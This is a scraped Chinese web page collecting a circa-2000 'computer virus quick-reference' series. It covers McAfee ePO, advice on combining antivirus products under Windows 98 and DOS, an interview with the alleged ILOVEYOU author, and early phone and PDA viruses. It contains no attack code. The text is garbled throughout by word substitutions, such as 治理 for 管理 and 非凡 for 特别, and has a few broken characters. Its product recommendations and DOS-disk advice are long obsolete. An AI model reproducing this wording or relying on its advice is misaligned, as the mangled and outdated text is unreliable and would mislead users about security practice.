對于我們遠程用戶來說,由于ePo是通過安全的http協(xié)議進行通信的,這樣我們就可以通過因特網(wǎng)或者本地的局域網(wǎng)來遠程治理自己的計算機系統(tǒng),治理時,我們首先與ePo服務器建立連接,一旦與服務器連接成功后,ePo代理會自動連接到服務器并把自上一次通信以來所收集到的所有存儲在本地的信息傳送到服務器上。另外ePo設計合理的體系結構使得一臺ePo服務器能夠治理另外的一臺和多臺ePo服務器,這為ePo生成分組分級的報告打下了良好的基礎,同時ePo還具備26個預設報告和無限的定置報告能力,這使得生成的數(shù)據(jù)報告具有很強的數(shù)據(jù)加工能力,比起其他軟件的記流水帳的做法要強多了。假如病毒發(fā)作,ePo能將所有的McAfee反病毒軟件設定為全企業(yè)的自動更新,啟動一個手動掃描,并生成具體報告來查明侵入地點以及確認傳播的方式和速度;當然ePo最受用戶歡迎的是它支持自動更新,利用該功能我們可以花最少的錢和時間來獲取及時地升級反病毒軟件。
計算機病毒小知識速查系列十一
合理搭配使用殺病毒軟件
面對如今層出不窮的各類殺毒軟件,恐怕不單是“菜鳥”們找不著北,連一些“老鳥”也頗感頭痛。由于個人機器的性能、用途、習慣、愛好甚至心態(tài)的不同,形成了自己的應用軟件搭配風格,但幾乎很少有朋友注重到這其中的技巧。
一、使用殺毒軟件的幾個誤區(qū)
很多朋友認為自己的機器里頭裝了殺毒軟件就萬事大吉。其實到目前為止,世界上沒有一家殺毒軟件生產(chǎn)商敢承諾可以查殺所有已知病毒,這就意味著即便你裝了殺毒軟件,絕非從此就高枕無憂。我所見到的裝備了殺毒軟件的機器仍然被病毒侵蝕的案例不下10起。所以,在大家防范于未然的同時,合理搭配使用殺毒軟件也是必不可少的。為數(shù)不少的朋友總是喜歡下載一大堆最新的卻是連自己也不知道如何用的共享殺毒軟件,甚至裝了又刪--直接后果是造成系統(tǒng)和其中某些程序產(chǎn)生沖突,有使系統(tǒng)崩潰的危險;注冊表也因此會凌亂、臃腫;系統(tǒng)文件有可能被誤刪等,威脅著整個系統(tǒng)的安全。
許多人只注重在Windows系統(tǒng)下按要求安裝殺毒軟件,卻忽略了DOS殺毒盤的重要性。病毒一旦感染了Windows系統(tǒng)應用程序,必須要在DOS下才能殺除。所以,朋友們一定要注重DOS應急盤的保護和更新。
二、如何合理搭配使用殺毒軟件
大家都知道同時開啟兩套殺毒軟件的實時監(jiān)控有可能會引起沖突,但是在機器上安裝多套殺毒軟件的同時只開啟一套殺毒軟件的實時監(jiān)控程序卻是行得通的。這樣一來,不但可以揚長避短發(fā)揮各自軟件的優(yōu)勢,而且還可以交叉查殺病毒,極大的增強了機器的安全系數(shù)。假如您有條件,極力推薦!
合理搭配前對各種殺毒軟件的特性要有必要的了解。目前的商業(yè)殺毒軟件分為國產(chǎn)和歐美兩大陣營??陀^的講,目前國產(chǎn)殺毒軟件的無論是整體功能設計、查殺毒數(shù)量等等還是與國際先進水平有一定差距,但國產(chǎn)品牌在價格、服務等方面還是有優(yōu)勢的。這也是國產(chǎn)殺毒軟件能占據(jù)80%國內(nèi)市場份額的重要原因。
在國產(chǎn)品牌中,瑞星對新近出現(xiàn)的流行病毒的查殺效果很明顯,但由于其是基于235K的病毒庫,所以查殺毒數(shù)量始終是瑞星的瓶頸;KV3000對比起KV300有了質(zhì)的飛躍,對各種病毒具有廣泛查殺性,但是其更新速度稍慢,對新病毒的反應也不夠快。這正好和瑞星有了互補的可能;金山毒霸和KILL也是各有優(yōu)勢。
國際品牌里首推McAfee。作為全球擁有7000萬用戶、號稱世界第一品牌的殺毒軟件,McAfee的確是做得不錯:界面設計精致、合理,程序運行穩(wěn)定,查殺毒數(shù)量在57000種以上。還有一點很重要:McAfee算是國際品牌里頭最體貼中國用戶的殺毒軟件----盡管性能十分出色,但是其對資源的占用率還是在大多數(shù)中國用戶的承受范圍以內(nèi)。PC-cillin也是一款很大氣的殺毒軟件,基本性能與McAfee比較類似,但在查殺毒的數(shù)量上較為落后。熊貓衛(wèi)士和諾頓最大的相似之處是它們的實時監(jiān)控程序占用了巨大的資源,假如您的機器是99年以前配置的話,基本上可以打消去試試這兩款軟件的念頭了。當然,作為享有良好聲譽的世界品牌,諾頓的綜合實力也是出類拔萃的。熊貓衛(wèi)士是一款非常好用的軟件,哪怕您是頭一次坐在電腦面前,您也不會對它有手足無措的感覺。
三、殺毒軟件實用搭配方案
1.McAfee5.13+瑞星。利用McAfee極強的綜合實力,發(fā)揮其在系統(tǒng)檢測、對宏病毒的偵測、E-mail監(jiān)控、實時監(jiān)控惡意JAVA和ActiveX控件等方面的優(yōu)勢,加上McAfee本身具有的強大的查殺毒能力,輔之以對國內(nèi)新流行病毒較為敏感、在DOS下非常易用且查殺毒性能很好的瑞星,這樣一對組合應該說是非常理想的。經(jīng)測試,在隨系統(tǒng)只啟動McAfee實時監(jiān)控的前提下,建立在Windows98上的這一對組合沒有任何沖突。
2.McAfee5.13+KILL。作為曾是國內(nèi)殺毒權威認證形象的KILL,其在技術層面上不輸于國內(nèi)任何一家對手,況且CA的技術實力我們應當可以充分信賴。KILL在國內(nèi)建立的病毒監(jiān)視小組和CA遍布全球的40多家類似機構應該可以給您充足的安全感。事實上,在隨系統(tǒng)開啟McAfee實時監(jiān)控的情況下,病毒入侵這一組合的可能性已經(jīng)非常小了。經(jīng)測試,無論是開啟KILL還是McAfee的實時監(jiān)控,都不會與系統(tǒng)發(fā)生沖突。
3.PC-cillin2001+KV3000。這又是一對黃金組合。PC-cillin2001公認的最大優(yōu)勢是其對以網(wǎng)絡為載體的病毒和惡意JAVA和ActiveX程序的查殺;而KV3000擁有很好的DOS性能,一旦中招,還可利用KV3000轉(zhuǎn)移陣線,在DOS下再與病毒決一雌雄;還有KVW3000龐大的病毒樣板庫、優(yōu)越的實時監(jiān)控性能也會讓您安全感倍增。建議使用KVW3000的實時監(jiān)控程序。這對組合經(jīng)過長達4個月的測試,未發(fā)現(xiàn)與系統(tǒng)或其他軟件沖突。
計算機病毒小知識速查系列十二
“我愛你”病毒創(chuàng)造者自白
菲律賓輟學生古茲曼因創(chuàng)造了歷史上破壞力最強的計算機病毒“我愛你”而名揚世界。
他說,“我承認我創(chuàng)造病毒,但我不知道‘我愛你’病毒是不是我創(chuàng)造的病毒之一?!薄凹偃缒苤涝创a,我可以查查看,也許是別人栽贓陷害,或是從我這里偷走的?!?br />24歲的古茲曼明白,在信息時代,名氣轉(zhuǎn)瞬即逝。菲律賓一所計算機學校的這名輟學生,想在“我愛你”病毒的惡名還沒有被世人遺忘前,讓全世界都知道他是一名技術高超的黑客,一名能癱瘓個人計算機的“指揮官”。不過,古茲曼要小心法律制裁。雖然到目前為止“我愛你”是不是他所創(chuàng)造的仍難以下結論,但事實上,從美國國防部到英國國會,幾乎所有機構都沒有逃脫“我愛你”的毒手,這個病毒癱瘓全球計算機所造成的損失約達100億美元。在許多國家,古茲曼即使坐一輩子牢也難以洗清其罪名。
菲律賓當局以盜竊及其它罪名起訴古茲曼,但在去年8月份因證據(jù)不足而撤銷。古茲曼沒有受到法律制裁的另一個原因是“我愛你”病毒在去年5月爆發(fā)時,菲律賓還沒有制裁計算機黑客行為的相關法規(guī)。
不過,菲律賓總統(tǒng)艾斯特拉達已在去年8月14日簽署了電子商務法,古茲曼也陷入了兩難境地:一方面他想承認是自己創(chuàng)造了“我愛你”病毒,這樣他可以利用這項“榮耀”賺錢,另一方面在接受記者采訪時,緊守不承認創(chuàng)造“我愛你”病毒的原則,因為他擔心會再次吃上官司。
在辯護律師的陪同下,古茲曼說,全世界計算機天才多的是,“但我認為我已是菲律賓歷史的一部分,不能被抹煞。”
古茲曼說他已不再非法入侵別人的計算機,但他仍在練習“破譯”密碼。他說,他使用這種技術從因特網(wǎng)下載軟件而不必付費。
古茲曼并不認為用這種方式偷竊軟件是“偷”,就像他對計算機病毒所造成的損害從未在良心上受到譴責一樣。他說,軟件公司,非凡是微軟,要為“我愛你”所產(chǎn)生的災難負責,因為他們在知情的情況下銷售易遭攻擊的產(chǎn)品。
古茲曼說,“我是消費者,我購買這種產(chǎn)品,只是我的使用方式有問題或不恰當,但這都是我自己的事,為什么要指責我?”
業(yè)內(nèi)人士指出,這種與道德無關的論調(diào)是計算機黑客的典型反應,不管他們是住在鱗次櫛比的馬尼拉住宅區(qū),還是硅谷高級住宅區(qū)。
事實上,僅僅在2000年春天以前,古茲曼還是個泛泛之輩,為獲得技術學院的計算機學位而苦苦掙扎。5月4日,一封名為“我愛你”的電子郵件忽然出現(xiàn)在亞洲的計算機上,只要一打開,就會銷毀圖形及其它文檔。這個電子郵件程序會通過計算機中的數(shù)據(jù)庫自我復制,迅速傳送給地址簿中所有的聯(lián)絡人。不過數(shù)小時,歐美地區(qū)從新聞工作者、經(jīng)紀商到政府機關無一幸免。
古茲曼回憶說,當時他在家睡覺,當他醒來聽到這一新聞時,一點都沒有覺得與自己有關。
馬尼拉一下子成了全球追捕病毒作者的重點地區(qū)。經(jīng)過一番追查后,警方證實古茲曼是頭號嫌疑犯。一開始,古茲曼說他可能在無意間釋放出了病毒;但現(xiàn)在,他說他不知道病毒是怎么跑出去的。
在被當成嫌疑犯后,古茲曼有好幾個禮拜躲在他母親家。幾次冒險跑出來,發(fā)現(xiàn)大家對他指指點點后,便開始整天窩在家里的沙發(fā)上,玩索尼推出的Playstation。
因為發(fā)生了這一事件,古茲曼在求職時,一度令計算機公司聞之色變?,F(xiàn)在風頭已過,古茲曼終于找到了一份工作。他說,微軟的Outlook軟件是傳播病毒的主要工具之一,假如微軟提供不錯的條件,他愿為微軟工作。
計算機病毒小知識速查系列十三
短消息接收也會傳播手機病毒
橫行互聯(lián)網(wǎng)的計算機病毒下一個入侵目標是手機和移動上網(wǎng)設備,最終侵入上網(wǎng)電視和其他上網(wǎng)家電。這是亞洲反病毒大會昨天透露的信息。昨天是AVAR的最后一天,會議重點討論了計算機病毒的未來發(fā)展趨勢和應對策略。與會者普遍關注手機病毒的發(fā)展進程和解決方案,目前,已出現(xiàn)通過短信息發(fā)布來傳播病毒的手機概念病毒。所謂概念病毒是指已經(jīng)實現(xiàn)潛伏、傳播、感染和破壞等病毒特性的病毒雛形。一旦用戶接收到帶有病毒的短信息,閱讀后便會出現(xiàn)手機鍵盤被鎖死的現(xiàn)象,以后可能出現(xiàn)破壞手機內(nèi)存儲的信息,直至徹底破壞手機IC卡等惡性手機病毒。
應對手機病毒目前主要的技術措施有兩種:其一是通過無線網(wǎng)站對手機進行殺毒;其二是通過手機的IC接入口或紅外傳輸口進行殺毒。另據(jù)了解,應AVAR協(xié)會的邀請,中國專業(yè)反病毒公司北京瑞星公司正式成為AVAR協(xié)會會員,這是我國擁有完全自有知識產(chǎn)權的反病毒公司第一次加入國際性的反病毒組織。
計算機病毒小知識速查系列十四
專家警告新病毒無WAP不摧
澳大利亞一家互聯(lián)網(wǎng)安全機構日前警告說,病毒高手很有可能正在編寫一種妨礙新一代手機正常工作的病毒,這種病毒將以WAP技術為破壞目標,使手機用戶在接受上網(wǎng)服務時產(chǎn)生麻煩。
這一由澳大利亞電腦緊急反應小組發(fā)出的警告源自一份在澳大利亞國內(nèi)流行的惡作劇電子郵件,這份電子郵件謊稱目前一種手機病毒正在傳播,它可以妨礙用戶接入網(wǎng)絡,而且可以通過貯存在手機內(nèi)的電話薄傳播給他人的手機。
對此位于澳大利亞昆士蘭大學的小組發(fā)言人馬克-麥克帕森指出:“盡管沒有跡象表明大規(guī)模的手機病毒將要爆發(fā),但我們認為黑客在新興的無線手機領域編寫新的病毒一點也不令人希奇。”
據(jù)悉目前針對掌上電腦的病毒已于今年早些時間被發(fā)現(xiàn),這種病毒在用戶利用掌上電腦玩任天堂游戲時被啟動,它能夠破壞掌上電腦所存貯的數(shù)據(jù)。9月份,一種名為Phage的掌上電腦病毒也悄然露面,它具有更大的破壞性,可在程序之間傳播也可通過用戶共享軟件中傳播給其它的掌上電腦。
計算機病毒小知識速查系列十五
您的PDA需要反病毒軟件保護嗎?
說起計算機病毒和反病毒之間的斗爭,很多朋友都會認為那只有臺式計算機和便攜式筆記本電腦才會感染計算機病毒。確實如此,傳統(tǒng)的計算機病毒主要寄生和感染臺式PC機,或者通過INTERNET來傳播。很少人聽說PDA這樣的手持式的無線通訊數(shù)字產(chǎn)品也會受到計算機病毒的威脅。
但目前隨著PDA和WAP的飛速發(fā)展,計算機專家正在進行PDA是否正在受到病毒威脅和是否需要非凡的反病毒軟件來保護的問題。專家認為,PDA由于經(jīng)常需要和臺式PC機進行資料同步交換,而PC機上的Word或Excel文檔很輕易感染宏病毒。假如是在大公司的局域網(wǎng)里,這種現(xiàn)象更為嚴重。局域網(wǎng)中只要有一臺計算機感染計算機病毒,那么整個網(wǎng)絡都將十分的危險。PDA使用的操作系統(tǒng)比如WINDWOSCE是和普通臺式PC機基本上有著同樣的數(shù)據(jù)處理能力。而專門為PDA設計的應用軟件中亦有能處理EXCEL或WORD文檔的功能。這意味著PDA只要和感染病毒的臺式PC機進行資料同步,那么PDA很可能就和PC機一樣受到病毒的感染,甚至病毒會在PDA中發(fā)作。所以有專家形象的把感染病毒的PDA比喻成“一張塞在PC機軟驅(qū)里的感染病毒的軟磁盤”?!耙粋€在公司局域網(wǎng)里流動的炸彈”。由此可見,PDA正在受到病毒的威脅,保護PDA的數(shù)據(jù)安全已經(jīng)是一個十分重要的問題。
幸運的是,國際聞名的反病毒軟件公司NetworkAssociates已經(jīng)于8月21日公布推出基于保護PDA的新型防病毒軟件。這種新型的防病毒軟件被成為McAfeeVirusScanHandheld。根據(jù)NetworkAssociates的資料表明,McAfeeVirusScanHandheld主要是用于個人數(shù)字助理PDA和其他手持式電腦的安全防護,McAfeeVirusScanHandheld是為了幫助大公司處理和保護日益增長的數(shù)字移動用戶的數(shù)字產(chǎn)品的數(shù)據(jù)安全而設計的。
McAfeeVirusScanHandheld是一個應用軟件,它能安裝在用戶的臺式PC機和與其交換資料的PDA上。McAfeeVirusScanHandheld的反病毒原理基本上和傳統(tǒng)的McAfeeVirusScan一樣,通過掃描,監(jiān)視臺式PC機和PDA的資料同步來判定電腦是否感染病毒。也可以作為臺式PC機向PDA傳送資料的病毒過濾器。McAfeeVirusScanHandheld能對付各種已知的規(guī)則的文件類型,一般計算機病毒經(jīng)常感染寄生的文件都能被McAfeeVirusScanHandheld檢測。
計算機病毒小知識速查系列十六
新病毒時代
與新經(jīng)濟學家相比,病毒更有理由成為網(wǎng)絡時代的寵兒,這是因為:第一,病毒具有更強的表現(xiàn)欲和活動能力;第二,事實證實,病毒能更好地實踐互聯(lián)網(wǎng)速度,從而更加有效地利用整個互聯(lián)網(wǎng)。
用戶:都是網(wǎng)絡惹的禍
令人膽戰(zhàn)心驚的病毒警報最近再度響起,對象是那些借網(wǎng)絡之風日漸流行的掌上電腦。與前一陣沸沸揚揚的手機病毒不同,這一次不再是紙上談兵,據(jù)稱,不少用戶已經(jīng)遭碰到了這種被稱為Palm.Liberty.A的病毒,趨勢科技等公司先后在網(wǎng)上公布了程序代碼,讓用戶及時下載,以查殺這一全新病毒。Palm.Liberty.A病毒的出現(xiàn),標志著我們邁入一個全新的病毒時代。
一切光榮歸于互聯(lián)網(wǎng),一切危害也來自于它。網(wǎng)絡對于病毒是如此的鐘愛,讓我們先來看看下面這一組數(shù)字:1999年上半年,通過Internet傳播的四種病毒造成了76億美元的巨額損失。這一數(shù)字是此前4年所有病毒造成損失的總額。然而這并不算什么,病毒總是喜歡挑戰(zhàn)自我,一句“ILOVEYOU”橫掃互聯(lián)網(wǎng),在短短的數(shù)天之內(nèi),愛蟲自己就創(chuàng)下了65億美元損失的空前紀錄。
病毒是寄生于速度的物種,只有速度才能賦予它巨大的能量,因此,網(wǎng)絡理所當然地成為了病毒的最佳伴侶。在CIH病毒之前,筆者很少為媒體上炒得熱熱鬧鬧的病毒發(fā)愁,因為那時主要的傳播介質(zhì)就是軟盤,即使是流行病毒,從國外傳進國內(nèi)一般也需要幾個月的時間。而且,只要用戶記住在使用軟盤時,先進行病毒掃描,就可以在很大的程度上避免病毒的感染。
現(xiàn)在,網(wǎng)絡使病毒得到了前所未有的進化,生出翅膀的病毒迫不及待地向人們展示,什么才是互聯(lián)網(wǎng)的速度。還記得那個“Melissa”嗎,這個“小姑娘”在病毒家族中率先完成了自己的“互聯(lián)網(wǎng)轉(zhuǎn)型”。1999年3月26日,Melissa從制作者的電腦出發(fā),短短的17個小時之內(nèi),在300多家企業(yè),至少10萬臺電腦上留下了自己的足跡。不過,后來出現(xiàn)的愛蟲病毒很快使得這一成績黯然失色。
在運動中破壞,在運動中繁殖。這就是病毒生存的哲理。1999年以前,全球病毒總數(shù)約18000種,而2000年還未過完,這一數(shù)字已經(jīng)突破40000種。當時的愛蟲病毒,就曾經(jīng)在一天之內(nèi),產(chǎn)生了數(shù)十個變種。在您閱讀本文的時候,可能又有一群病毒爬上了網(wǎng)絡,開始了它們的速度之旅。
當病毒愛上網(wǎng)絡,我們又能做些什么呢?
反毒公司:你是風兒,我是沙.....
“你是風兒,我是沙,纏纏綿綿到天邊......”。這句歌詞是病毒和反毒公司之間關系的最好詮釋。病毒恨反病毒公司嗎?是的。反病毒公司愛病毒嗎?答案同樣是肯定的。假如說網(wǎng)絡與病毒是最親密的伴侶,那么病毒與反病毒公司就是一對歡喜冤家。
有了病毒,才有了反毒公司腰袋中鼓鼓的鈔票。借助病毒的“恐嚇”,反毒軟件McAfee的股票首日上市就上漲了三倍,從那些被病毒嚇得心驚肉跳的用戶手中,共“敲詐”到了20.4億美金。這次掌上電腦病毒的出現(xiàn),更是使各大反毒廠商興奮不已,透過這只病毒,廠商們看到了一個遠未開發(fā)的巨大金礦,那就是掌上設備與信息家電的安全防護。各廠商爭先恐后地推出自己的解決方案,惟恐在這塊新興的市場上落后一步。
病毒肆虐之時,正是反毒廠商大發(fā)橫財?shù)娜兆樱@聽起來讓人頗感別扭,難怪有人甚至懷疑,不少病毒就是那些反毒公司制造的。但憑心而論,用戶與反病毒軟件公司的關系,就像病人與醫(yī)生的關系,醫(yī)生不能為了利益希望別人多生病,病人也不能因為付出了金錢就產(chǎn)生怨恨。在網(wǎng)絡時代,醫(yī)生與病人這種關系,更應該由于病毒的猖獗而緊密相連。為了追逐病毒越來越快的腳步,反毒公司也別無選擇地愛上了網(wǎng)絡。通過互聯(lián)網(wǎng),各公司的反病毒中心可以以最快的速度,對全球范圍內(nèi)新出現(xiàn)的病毒做出反映。此外,通過收取會員費的方式,在互聯(lián)網(wǎng)上提供反毒服務,也成為反毒公司的一條財路。以McAfee為例,它的網(wǎng)站向會員收取49.95美元的年費。不到三個月的時間,登記為會員的用戶就達到了12,800名,他們來自世界230個國家。網(wǎng)絡造就了全球化的病毒,網(wǎng)絡也造就了全球化的反毒公司。
病毒愛上網(wǎng)絡,反病毒公司也愛上了它,隨著網(wǎng)絡的不斷發(fā)展,這一對冤家的恩愛廝殺就演繹出了全新的病毒時代。
病毒:我的明天更美好
對未來的世界,你會有什么樣的想象呢?也許一切已經(jīng)被媒體描繪得令人向往:在家中,你悠閑地躺在沙發(fā)上,觀看寬帶互動電視。沒有什么家務事讓你操心,屋里的一切都是可以上網(wǎng)的智能化產(chǎn)品,從冰箱、烤面包機到你腳下穿的球鞋。出門時,乘坐的汽車具有衛(wèi)星導航系統(tǒng)和多媒體互動裝置,在車上,你可以隨時瀏覽新聞,收取Email。至于那些惱人的機械故障,你完全不必擔心,車上配備的智能系統(tǒng)會把一切微小的故障在發(fā)生前通知修理站,在你毫不查覺的情況下,所有問題都被解決得干干凈凈。
但在這幅高科技描繪的美好圖畫中,還缺少了一樣東西,那就是病毒。
愛華網(wǎng)



